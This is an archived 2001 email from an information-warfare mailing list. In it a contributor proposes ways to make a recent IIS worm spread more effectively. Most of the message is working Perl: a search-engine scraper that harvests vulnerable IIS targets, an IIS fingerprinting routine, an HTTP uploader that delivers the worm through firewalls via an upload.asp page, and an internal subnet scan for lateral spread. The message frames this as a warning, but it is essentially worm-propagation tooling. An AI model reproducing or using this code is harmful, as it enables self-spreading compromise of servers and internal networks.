Return-Path: <sentto-279987-2089-1000951291-fc=all.net@returns.onelist.com> Delivered-To: fc@all.net Received: from 204.181.12.215 by localhost with POP3 (fetchmail-5.1.0) for fc@localhost (single-drop); Wed, 19 Sep 2001 19:03:10 -0700 (PDT) Received: (qmail 25679 invoked by uid 510); 20 Sep 2001 02:02:11 -0000 Received: from n32.groups.yahoo.com (216.115.96.82) by 204.181.12.215 with SMTP; 20 Sep 2001 02:02:11 -0000 X-eGroups-Return: sentto-279987-2089-1000951291-fc=all.net@returns.onelist.com Received: from [10.1.1.220] by hn.egroups.com with NNFMP; 20 Sep 2001 02:01:48 -0000 X-Sender: fc@big.all.net X-Apparently-To: iwar@onelist.com Received: (EGP: mail-7_3_2_2); 20 Sep 2001 02:01:31 -0000 Received: (qmail 78804 invoked from network); 20 Sep 2001 02:01:31 -0000 Received: from unknown (10.1.10.26) by 10.1.1.220 with QMQP; 20 Sep 2001 02:01:31 -0000 Received: from unknown (HELO big.all.net) (65.0.156.78) by mta1 with SMTP; 20 Sep 2001 02:01:47 -0000 Received: (from fc@localhost) by big.all.net (8.9.3/8.7.3) id TAA09897 for iwar@onelist.com; Wed, 19 Sep 2001 19:01:47 -0700 Message-Id: <200109200201.TAA09897@big.all.net> To: iwar@onelist.com (Information Warfare Mailing List) Organization: I'm not allowed to say X-Mailer: don't even ask X-Mailer: ELM [version 2.5 PL1] From: Fred Cohen <fc@all.net> Mailing-List: list iwar@yahoogroups.com; contact iwar-owner@yahoogroups.com Delivered-To: mailing list iwar@yahoogroups.com Precedence: bulk List-Unsubscribe: <mailto:iwar-unsubscribe@yahoogroups.com> Date: Wed, 19 Sep 2001 19:01:47 -0700 (PDT) Reply-To: iwar@yahoogroups.com Subject: [iwar] [fc:Enhanced.worm.code.proposed.in.source.form...] Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit (excuse the X posting - I dont know where it will be moderated) Moderators, Here some comments and code on the new worm. Publish if you think it might do any good. If not I'll understand 100%. --cut-- Three things that could have made the worm better/worse: 1. Targetting ------------- The targetting sucks. Random targetting is just SO ancient, and its simply not nice. Why not use the technology out there - search engines. Lets say I want to get some random 1000 Microsoft IIS servers - I get on to Google and search for: <random word here +.asp -"application service provider" ..and browse through the list. In fact hereby a sweet little piece of PERL that will do just that: #!/usr/bin/perl use Socket; $host="www.google.com"; $port=80; @nogos=("av.com","yahoo","google.com","excite","lycos","geocities"); $target = inet_aton($host); $term="computer"; for ($i=0; $i<1000; $i=$i+100){ @response=sendraw("GET /search?q=$term+%22.asp%22+-application+-service+-provider&n um=100&hl=en&safe=off&start=$i&sa=N HTTP/1.0\r\n\r\n"); foreach $line (@response){ if ($line =~ /http/){ ($duh,$one)=split(/\/\//,$line); if ($one =~ /\.asp/) { ($two,$duh)=split(/\//,$one); $flag=0; foreach $nogo (@nogos){ if ($two =~ /$nogo/){$flag=1;} } if ($flag==0){$url{$two}++;print $one;} } } } } foreach $theurl (keys(%url)){ print "site: $theurl"; } ###good old sendraw sub sendraw { my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || return ""; if(connect(S,pack "SnA4x8",2,$port,$target)){ my @in=""; select(S); $|=1; print $pstr; while(<S) { push @in,$_; last if ($line=~ /^[\n\r]+$/ );} select(STDOUT); return @in; } else { return ""; } } And there you go +- 1000 targets +- 75% of them nice fresh IIS boxes. Select a new term, and hey - another 1000 IIS servers. Just shove a list with 10000 terms in there, choose a random one and mine..it does not have to be Google - there are zillions of search engines out there - pick a random one. Now - isn't that a bit more effective than hitting random boxes?? Then - why the heck hitting a box when you not even sure its an IIS server? DUH!!! ##check for IIS sub isms{ ($name)=@_; @results = sendraw("HEAD / HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Microsoft/) {return "1";} } return "0"; } 2. Getting the worm at the other end. ------------------------------------- TFTP?? NOT! Why - is everyone allowing UDP to pass? I think not. How many hosts allowing outside connections? Grim - simply grim. Just not cricket. Why not get the worm on the box with HTTP only? Say - you can execute a command on the server right? And do an "echo" right?? Why not create a page where you can upload anything? Hereby the uploader to upload the worm to the next host. Uploader itself: ####use like this:$uploadresult=loader($host,$updir,$filename); sub loader{ ($host,$dir,$filename)=@_; $target = inet_aton($host); $headerfile=<<EOT -----------------------------6628240843774015751103527590 Content-Disposition: form-data; name="File1"; filename="$filename" Content-Type: application/octet-stream EOT ; $footerfile=<<EOT -----------------------------6628240843774015751103527590 Content-Disposition: form-data; name="Action" Upload the file -----------------------------6628240843774015751103527590-- EOT ; $headerfile=~s/\n/\r\n/g; $footerfile=~s/\n/\r\n/g; my $file; open (IN,$filename) || return "1"; binmode(IN); while (<IN){ $file=$file.$_; } $subheader=$headerfile.$file.$footerfile; $filelength=length($subheader); print "length of the request is $filelength\n"; $headerhttp=<<EOT POST /$dir/upload.asp HTTP/1.0 User-Agent: None Host: $host Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png,*/* Accept-Encoding: gzip Accept-Charset: iso-8859-1,*,utf-8 Content-type: multipart/form-data; boundary=---------------------------6628240843774015751103527590 Content-Length: $filelength EOT ; $headerhttp=~s/\n/\r\n/g; $fullrequest=$headerhttp.$subheader; @r=sendraw($fullrequest); foreach $line (@r){ if ($line=~/Olifante/) {return "0";} } return "1"; } Thats the loader itself. The page to create the upload page on the server has been documented extensively before by myself. Go to packetstorm, and search for "unitools". The tar file contains the upload pages and the code to create the files on the server. With this, the worm can be propogated through firewalls that do NAT and filter everything but port 80. Only 80...thats all you need. 3. Further spread ----------------- In many instances, webservers are connected with 1:1 NAT behind a firewall. IP numbers of webservers in such schenarios are 10s, 172.16 and 192.168s. Now - again - if the server can't go out - why not go in? Look at the class C, test for host there and spread internally: @results=`ipconfig`; foreach $line (@results){ chomp $line; if ($line=~/Addr/){ ($duh,$myip)=split(/:/,$line); } } ##start internal scan $num=0; ($one,$two,$three,$duh)=split(/\./,$myip); for ($i=1; $i<255; $i++){ $scanip=$one.".".$two.".".$three.".".$i; @results=`ping -n 1 -w 40 $scanip`; foreach $scanned (@results){ if ($scanned =~ /TTL/) { $eight=Sconnect(80,$scanip); if ($eight ==1){ $ismic=isms($scanip); if ($ismic eq "1"){ ($duh,$miner)=split(/from/,$scanned); (@mine[$num],$duh)=split(/\:/,$miner); @mine[$num] =~ s/ //g; $num++; } } } } } sub Sconnect { my($port,$address)=@_; my $ret=0; my $protocole=(getprotobyname("tcp"))[2]; my $MASK="S n a4 x8"; my @byte=split /\./, $address; $packAddress=pack("C4",@byte); my($connectPointer)=pack($MASK,&AF_INET,$port,$packAddress); socket(SOCKET,&AF_INET,&SOCK_STREAM,$protocole)||die "Socket SConnect: $!\n"; if(connect(SOCKET,$connectPointer)){ $ret=1; close SOCKET; } return $ret; } With this we get all IIS server on the class C. Anyhow.. Bottom line? Well - just this - worms can be much more effective - so beware - this is just the start. The Outlook/IE bit - nicely done (in a severe twisted sense). Have a wonderful day, Roelof. ------------------ http://all.net/ Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/
This archive was generated by hypermail 2.1.2 : 2001-09-29 21:08:45 PDT